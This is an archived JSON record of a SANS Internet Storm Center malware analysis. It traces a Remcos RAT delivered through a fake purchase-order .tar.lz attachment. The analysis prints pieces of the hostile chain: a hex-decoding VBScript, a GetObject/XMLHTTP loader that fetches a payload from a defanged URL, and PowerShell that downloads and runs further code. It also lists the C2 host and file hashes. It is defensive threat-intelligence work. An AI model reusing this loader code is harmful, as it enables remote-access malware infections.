{
	"id": "3c57ba7e-70f6-41c2-9a7b-fd17d6bff43f",
	"created_at": "2026-04-06T00:21:45.679133Z",
	"updated_at": "2026-04-10T03:21:10.552274Z",
	"deleted_at": null,
	"sha1_hash": "19be13ad7e6361a76bdaf7454f5a866d619974a6",
	"title": "Remcos RAT Delivered Through Double Compressed Archive",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 75051,
	"plain_text": "Remcos RAT Delivered Through Double Compressed Archive\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 19:27:30 UTC\r\nOne of our readers shared an interesting sample received via email. Like him, if you get access to\r\ninteresting/suspicious data, please share it with us (if you’re authorized of course). We are always looking for\r\nfresh meat!\r\nThe file was received as an attachment to a mail that pretended to be related to a purchase order. The file was\r\ncalled “P0-65774383__pdf.tar.lz”\r\n(SHA256:ea91dc0fdd99aab9e990b6520c136fc2f0c19b4ba82691ceef853ad4a86c0141). Note the double\r\nextension; it can be processed with lunzip on REMnux:\r\nremnux@remnux:/MalwareZoo/20220215$ lunzip -l P0-65774383__pdf.tar.lz\r\n uncompressed compressed saved name\r\n 10240 1362 86.70% P0-65774383__pdf.tar.lz\r\nremnux@remnux:/MalwareZoo/20220215$ file P0-65774383__pdf.tar.lz\r\nP0-65774383__pdf.tar.lz: lzip compressed data, version: 1\r\nThis is a strange way to deliver the payload because files with the extension '.lz' are not supported by default on\r\nWindows systems. There is no tool associated with the extension.\r\nLet’s decompress it and untar it:\r\nremnux@remnux:/MalwareZoo/20220215$ lunzip P0-65774383__pdf.tar.lz\r\nremnux@remnux:/MalwareZoo/20220215$ file P0-65774383__pdf.tar\r\nhttps://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/\r\nPage 1 of 3\n\nP0-65774383__pdf.tar: POSIX tar archive (GNU)\r\nremnux@remnux:/MalwareZoo/20220215$ tar xvf P0-65774383__pdf.tar\r\n./\r\n./Protected Client.vbs\r\nThe ‘Protected Client.vbs’ script is nicely obfuscated.\r\nSensitive strings (that could reveal the purpose of the script) are encoded and decoded using the following\r\nfunction:\r\nPrivate Function MpGGKjWFHKaZCsd(sData)\r\n For iChar = 1 To Len(sData) Step 2\r\n pGwFuYQQKTRe = Chr(\"\u0026H\" \u0026 Mid(sData, iChar, 2))\r\n fQMBscV = fQMBscV \u0026 pGwFuYQQKTRe\r\n Next\r\n MpGGKjWFHKaZCsd = fQMBscV\r\nEnd Function\r\nIt’s a simple hex-encoding! Nothing fancy! But the interesting technique is the following, based on GetObject[1].\r\nThis function is used to obtain a reference to an object provided by an ActiveX component, usually, it’s a path and\r\nfile name. But here we have something different (decoded using the function above):\r\nSet YXHivrLSJ = GetObject(“new:F5078F32-C551-11D3-89B9-0000F81FE221”)\r\nThis UUID correspond to the ProgID 'MSXML2.XMLHTTP.3.0' as referenced in the Microsoft documentation[2].\r\nThen, the object is populated with malicious content loaded from the following URL:\r\nExecute(\"YXHivrLSJ.Load “hxxp://kastex[.]me/bkp/ybn.jpg'\r\nExecute(\"YXHivrLSJ.transformNode (YXHivrLSJ)\")\r\nThe URL returns the XML content expected by the object. The file contains a Powershell payload, again hex-encoded:\r\nvar yy=r.ShellExecute(\"powershell.exe\",nm12er7fdffff(\"2467663D2830303130303130302C30313030303130312C3\r\nOnce extracted, it contains:\r\n$uJmg=(01100110,01110101,01101110,01100011,01110100,01101001,01101111,01101110,00100000,01110100,0100\r\n...\r\n,00001010,01111101) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I\r\nhttps://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/\r\nPage 2 of 3\n\nDecode and beautified, we have this code:\r\n$ErrorActionPreference = 'SilentlyContinue';\r\n$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]:\r\n'[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')'|IEX;\r\ndo {\r\n $ping = test-connection -comp google.com -count 1 -Quiet\r\n} until ($ping);\r\n$tty='(NewObject Net.WebClient)' | IEX;\r\n$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.Cal\r\nThe site has already been cleaned and the payload deleted but, with a bit of hunting on VT, it’s possible to get a\r\ncopy of the payload. It’s another piece of Powershell that drops the following malware\r\n(SHA256:8e41caaf8c87e94296783d9907fa170e696175ff46a57584d04df6867b1cfab1). This file is unknown on\r\nVT but, after a quick analysis, it's a Remcos[3] RAT sample (C2: notme[.]linkpc[.]net:4376).\r\n[1] https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/getobject-function\r\n[2] https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766426(v=vs.85)\r\n[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos\r\nXavier Mertens (@xme)\r\nXameco\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/\r\nhttps://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/"
	],
	"report_names": [
		"28354"
	],
	"threat_actors": [],
	"ts_created_at": 1775434905,
	"ts_updated_at": 1775791270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/19be13ad7e6361a76bdaf7454f5a866d619974a6.pdf",
		"text": "https://archive.orkl.eu/19be13ad7e6361a76bdaf7454f5a866d619974a6.txt",
		"img": "https://archive.orkl.eu/19be13ad7e6361a76bdaf7454f5a866d619974a6.jpg"
	}
}